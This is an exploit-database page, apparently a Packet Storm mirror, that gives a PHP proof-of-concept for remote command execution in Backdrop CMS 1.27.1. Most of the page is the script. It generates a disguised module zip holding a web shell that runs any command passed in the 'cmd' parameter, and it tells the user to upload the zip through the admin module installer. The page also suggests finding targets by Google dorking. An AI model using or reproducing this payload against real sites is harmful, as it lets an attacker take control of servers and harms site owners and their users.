Share
## https://sploitus.com/exploit?id=PACKETSTORM:189764
=============================================================================================================================================
| # Title : Backdrop CMS 1.27.1 PHP COde Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Code Description: Backdrop CMS 1.27.1 - Remote Command Execution Exploit in PHP
(Related : https://packetstorm.news/files/id/178631/ Related CVE numbers: ) .
[+] save code as poc.php.
[+] Usage: php script.php [url]
[+] PayLoad :
<?php
function create_files() {
$info_content = <<<EOL
type = module
name = Block
description = Controls the visual building blocks a page is constructed
with. Blocks are boxes of content rendered into an area, or region, of a
web page.
package = Layouts
tags[] = Blocks
tags[] = Site Architecture
version = BACKDROP_VERSION
backdrop = 1.x
configure = admin/structure/block
; Added by Backdrop CMS packaging script on 2024-03-07
project = backdrop
version = 1.27.1
timestamp = 1709862662
EOL;
$shell_info_path = "shell/shell.info";
if (!file_exists(dirname($shell_info_path))) {
mkdir(dirname($shell_info_path), 0777, true); // ุฅูุดุงุก ุงูู
ุฌูุฏ ุฅุฐุง ูู
ููู ู
ูุฌูุฏูุง
}
file_put_contents($shell_info_path, $info_content);
$shell_content = <<<EOL
<html>
<body>
<form method="GET" name="<?php echo basename(\$_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset(\$_GET['cmd'])) {
system(\$_GET['cmd']);
}
?>
</pre>
</body>
</html>
EOL;
$shell_php_path = "shell/shell.php";
file_put_contents($shell_php_path, $shell_content);
return [$shell_info_path, $shell_php_path];
}
function create_zip($info_path, $php_path) {
$zip_filename = "shell.zip";
$zip = new ZipArchive();
if ($zip->open($zip_filename, ZipArchive::CREATE) === TRUE) {
$zip->addFile($info_path, 'shell/shell.info');
$zip->addFile($php_path, 'shell/shell.php');
$zip->close();
}
return $zip_filename;
}
function main($url) {
echo "Backdrop CMS 1.27.1 - Remote Command Execution Exploit\n";
sleep(3);
echo "Evil module generating...\n";
sleep(2);
list($info_path, $php_path) = create_files();
$zip_filename = create_zip($info_path, $php_path);
echo "Evil module generated! $zip_filename\n";
sleep(2);
echo "Go to $url/admin/modules/install and upload the $zip_filename for Manual Installation.\n";
sleep(2);
echo "Your shell address: $url/modules/shell/shell.php\n";
}
if ($argc < 2) {
echo "Usage: php script.php [url]\n";
} else {
main($argv[1]);
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================